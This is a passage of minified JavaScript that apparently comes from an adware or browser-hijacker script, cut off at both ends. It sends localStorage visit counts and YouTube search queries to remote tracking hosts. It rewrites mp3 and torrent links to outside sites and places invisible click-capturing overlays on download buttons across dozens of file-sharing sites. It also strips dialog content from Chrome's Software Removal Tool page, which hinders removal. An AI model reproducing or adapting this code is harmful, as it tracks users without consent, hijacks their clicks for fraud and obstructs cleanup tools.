j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...4rHs9rHUGpdC=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children.getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transf...08.107.48.171\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch®{}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=14365491252932439287&eid=684&pid=1&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bcvzdw\",function(a){if(!a.bcvzdw&&!localStorage.getItem(\"bcvzdw\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a&&a.href&&\"mp3\"==a.href.substr(-3)){var c=a.href;a.setAttribute(\"href\",\"http://mp3juices.se/...eURIComponent(a.innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent©)+\"/el/1\");a.setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bcvzdw:\"2\"});localStorage.setItem(\"bcvzdw\",\"2\")},!1)}})}catch(d){}})();(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"djdnjxa\",function(a){if(!a.djdnjxa&&!localStorage.getItem(\"djdnjxa\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a&&a.href&&\"torrent\"==a.href.substr(-7)){var c=a.href;a.setAttribute(\"href\",\"https://torrent.isoh...cf7d31568e17b\");a.setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({djdnjxa:\"2\"});localStorage.setItem(\"djdnjxa\",\"2\")},!1)}})}catch(d){}})();;new function(){var n=this;this.activeZds={\"uploading.com\":1,\"dirpy.com\":0,\"go4up.com\":0,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\"ubtitles4free.ne\":1,\n\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":0,\"uploadrocket.net\":1,\"programas-gratis.net\":1,\"programasgratis.es\":1,\"programasejogos.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":1,\"vitanclub.net\":1,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":0,\"mestorrents.com\":1,\"vitorrent.net\":1,\"uploaded.net\":0,\"newsinitiative.org\":0,\n\"megafilmesonlinehd.com\":1,\"mycoolmp3.com\":1,\"descargadictos.net\":0,\"toggle.com\":1,\"downloadshareware.com\":1,\"primewire.ag\":1,\"ads.showmeflix.com\":0,\"myappsforpc.com\":1};this.utils=new function(){var e=this;e.sendPixels=function(e){var k;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];k=new Image;k.src=m}else k=new Image,k.src=e};e.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};e.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var p=new Date;\np.setTime(p.getTime()+864E5*m);m=\"; expires=\"+p.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),m=0;m<h.length;m++){for(var p=h[m];\" \"==p.charAt(0);)p=p.substring(1,p.length);if(0==p.indexOf(e))return p.substring(e.length,p.length)}return null};e.eraseCookie=function(k){e.createCookie(k,\"\",-1)}};e.ajax={get:function(h,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",h,!0),this.xhr.onreadystatechange=function(){4==\ne.ajax.xhr.readyState&&k(e.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(h,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",h,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==e.ajax.xhr.readyState&&l(e.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};e.waitForTokens={};e.addScript=function(e,k){if(\"bing\"==k){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=\ndocument.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};e.waitForElement=function(h,k,l,m){var p=e.query_selector_all(h);clearTimeout(e.waitTimeout);if(25<n.waitForElementCounter)return k(null);if(\"undefined\"==typeof p||1>p.length){if(e.waitForTokens[m])return k(null);var q=arguments.callee;e.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(h,k,l,m)},l)}else{if(e.waitForTokens[m])return k(null);\ne.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};e.flushWaitForTokens=function(){e.waitForTokens={}};e.getRandomInt=function(e,k){return Math.floor(Math.random()*(k-e+1))+e};e.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(h){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=e.dhtml_prop_name(k);return\"object\"==typeof h.currentStyle&&null!=h.currentStyle&&\"undefined\"!=typeof h.currentStyle[k]?h.currentStyle[k]:null}}}:function(e,k){return window.getComputedStyle(e,\nk)||{getPropertyValue:function(){}}};e.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(k){}}:function(e){var k=e.match(/^#([^,\\s]+)$/)||[];if(1<k.length)return e=document.getElementById(k[1])||void 0,\"undefined\"!=typeof e?[e]:[];k=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(k);document.__asya_qsaels=[];k.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};\ne.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var k=new e.constructor,l;for(l in e)k[l]=arguments.callee(e[l]);return k}return e};e.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};e.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};e.throttle=\nfunction(e,k){var l=null;return function(){var m=this,p=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,p)},k)}};e.epoch=function(){return(new Date).getTime()};e.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();e.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=\ne?!0:!1};e.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};e.match_url=function(h,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):e.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(h))return!0}};e.ping=function(e){for(var k=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<k.length;l++)if(-1<location.hostname.indexOf(k[l])){var m=\nnew Image,p=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<p.length&&(p=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);m.src=n.pixelHost+\"?hid=14365491252932439287&eid=684&pid=1&prodid=338&v=\"+n.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+k[l]+\"&host=\"+q+\"&ref=\"+p}};e.getAllText=function(e){for(var k=\"\",l=0;l<e.length;l++)k+=e.textContent?e.textContent:e.innetText;return k};\ne.duplicateElement=function(h){var k=document.createElement(h.nodeName.toLowerCase());h.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var l in h)if(\"src\"==l||\"width\"==l||\"height\"==l||\"id\"==l||\"className\"==l)k[l]=h[l];else if(\"style\"==l)for(var m in h[l])h[l][m]&&\"\"!=h[l][m]&&(k[l][m]=h[l][m]);else\"input\"!==h.nodeName.toLowerCase()||\"type\"!=l&&\"value\"!=l||(k[l]=h[l]);for(l=0;l<h.childNodes.length;l++)if(3==h.childNodes[l].nodeType)m=h.childNodes[l].textContent?h.childNodes[l].textContent:\nh.childNodes[l].innerText,\"undefined\"===typeof m&&(m=h.childNodes[l].nodeValue?h.childNodes[l].nodeValue:h.childNodes[l].data),\"undefined\"!==typeof m&&k.appendChild(document.createTextNode(m));else{m=e.duplicateElement(h.childNodes[l]);var p=e.getAllText(m.childNodes),q=h.childNodes[l].textContent?h.childNodes[l].textContent:h.childNodes[l].innerText;q&&(q=q.replace(p,\"\"),\"\"!=e.trim(q)&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};e.coverElement=function(e,k,l,m,p,q,n,\nr){var u=document.createElement(\"div\");u.style.width=k?k:\"100%\";u.style.height=l?l:\"100%\";u.style.zIndex=q?q:\"2000\";u.style.top=m?m:\"0\";u.style.left=p?p:\"0\";u.style.cursor=n?n:\"pointer\";u.style.position=\"absolute\";k=e.parentNode;k.style.position=\"relative\";!0!==r&&\"undefined\"!==typeof r||k.removeChild(e);k.appendChild(u)};e.trim=function(e){return\"function\"!==typeof String.prototype.trim?String(e).replace(/^\\s+|\\s+$/g,\"\"):String.prototype.trim(e)}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=\nfunction(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(e){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(e){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var e=document.links,k=0;k<e.length;k++){var l=e[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=\ndocument.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=e[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"go4up.com\"]=new function(){this.init=function(){if(!window.__AAintervalCounter&&window.self==window.top&&-1<location.host.toLowerCase().indexOf(\"o4up.co\")){window.__AAintervalCounter=\n0;window.__AAinterval=setInterval(function(){var e=document.getElementById(\"linklist\");e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"100px\";h.style.right=\"30px\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.appendChild(h);10<window.__AAintervalCounter&&clearInterval(window.__AAinterval)},1001);for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++){var k=e[h].children[0];k&&k.setAttribute(\"href\",\n\"javascript:void(0);\");e[h].style.position=\"relative\";k=document.createElement(\"div\");k.style.position=\"absolute\";k.style.zIndex=\"2000\";k.style.height=\"100%\";k.style.width=\"100%\";k.style.right=\"0\";k.style.top=\"0\";k.style.cursor=\"pointer\";e[h].appendChild(k)}}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var e=document.links,h=0;h<e.length;h++)if(\"return prepare_download_file(this);\"==e[h].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\n\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var p=e[h].parentNode,n=p.children[p.children.length-1];n&&(p.removeChild(e[h]),p.insertBefore(m,n))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var e=document.getElementById(\"download-manager-checkbox\");if(null!==e)try{e.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=\n!1}catch(h){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var e=document.getElementById(\"download-manager-checkbox\");if(null!==e)try{e.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(h){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=\ndocument.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var e=document.getElementsByClassName(\"nasjfkla\"),h=0;h<e.length;h++)e[h].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var e=document.links[i],h=e.getAttribute(\"onclick\");h&&-1<h.indexOf(\"prepare_download_file\")&&(e=e.parentNode,e.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",\nb.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",e.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var e=document.getElementById(\"leftside\"),h=0;h<e.children.length;h++)if(/\\bspnBook\\b/.test(e.children[h].className))for(var m=e.children[h].getElementsByTagName(\"a\"),p=0;p<m.length;p++)m[p].setAttribute(\"href\",\"#\"),m[p].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var e=n.utils.query_selector_all(\".reclamTable .reclamRow .reclamCell a\"),\nh=0;h<e.length;h++){var k=e[h],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}e=n.utils.query_selector_all(\".contentback div div a[target='_blank']\");for(h=0;h<e.length;h++)k=e[h],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);e=n.utils.query_selector_all(\".contentback div center a[target='_blank']\");for(h=0;h<e.length;h++)k=e[h],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);new function(){-1<\nlocation.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++)if(0!=h&&!(-1<e[h].innerHTML.indexOf(\"adcopy-outer\")||-1<e[h].innerHTML.indexOf(\"btn_download\")||-1<e[h].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";h==e.length-\n1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";e[h].style.position=\"relative\";e[h].appendChild(k)}e=document.getElementById(\"cap\");null!=e&&(e.parentNode.style.position=\"relative\",e.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var e=document.getElementsByTagName(\"div\"),\nh=0;h<e.length;h++)if(e[h].style&&\"653px\"==e[h].style.width&&\"49px\"==e[h].style.height){var k=e[h];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var e=document.links,h=0;h<e.length;h++){var k=e[h].innerText?e[h].innerText:e[h].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==\ne[h].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":k.textContent=\"Stream Video Now!\";var l=e[h].parentNode,n=l.children[l.children.length-1];l.removeChild(e[h]);if(n)try{l.insertBefore(k,n)}catch(u){l.appendChild(k)}else l.appendChild(k)}}e=document.getElementsByTagName(\"a\");for(h=0;h<e.length;h++)if(\"getDownload();\"==e[h].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),\nk.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=e[h].parentNode,n=l.children[l.children.length-1],l.removeChild(e[h]),n)try{l.insertBefore(k,n)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);e=document.createElement(\"script\");e.type=\"text/javascript\";e[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var e=$(\"#adsfrm\").offset();\n$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+e.top+\"px;left:\"+e.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(h){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(e)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),\ng.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",f=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var e=\nfunction(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))e();else{var h=document.createElement(\"script\");h.type=\"text/javascript\";h.innerHTML=\"(\"+e.toString()+\")()\";document.body.appendChild(h)}}}};this[\"sharebeast.com\"]=\nnew function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var e=document.getElementsByTagName(\"div\"),h;for(h in 